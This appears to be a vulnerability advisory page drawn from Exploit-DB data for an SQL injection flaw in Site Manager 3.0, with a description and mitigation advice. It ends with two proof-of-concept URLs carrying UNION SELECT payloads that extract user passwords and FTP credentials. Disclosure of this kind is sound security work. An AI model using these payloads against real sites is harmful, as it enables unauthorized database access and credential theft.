SQL Injection vulnerability in Site Manager

vendor:

Site Manager

by:

Unknown

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Site Manager

Affected Version From: Site Manager 3.0

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

Unknown

SQL Injection vulnerability in Site Manager

The vulnerability allows an attacker to perform SQL injection attacks by manipulating user-supplied data in an SQL query. By exploiting this vulnerability, an attacker can compromise the application, access or modify data, or exploit other vulnerabilities in the database.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/39973/info

Site Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Site Manager 3.0 is vulnarable; other versions may also be affected.

http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,concat(name,0x3a,password),6+from+author
http://www.example.com/page.cfm?id=null+and+100=99+union+select+1,2,3,4,conca(ftpserver,0x3a,domainname,0x3a,ftpusername,0x3a,ftppassword),6+from+webdata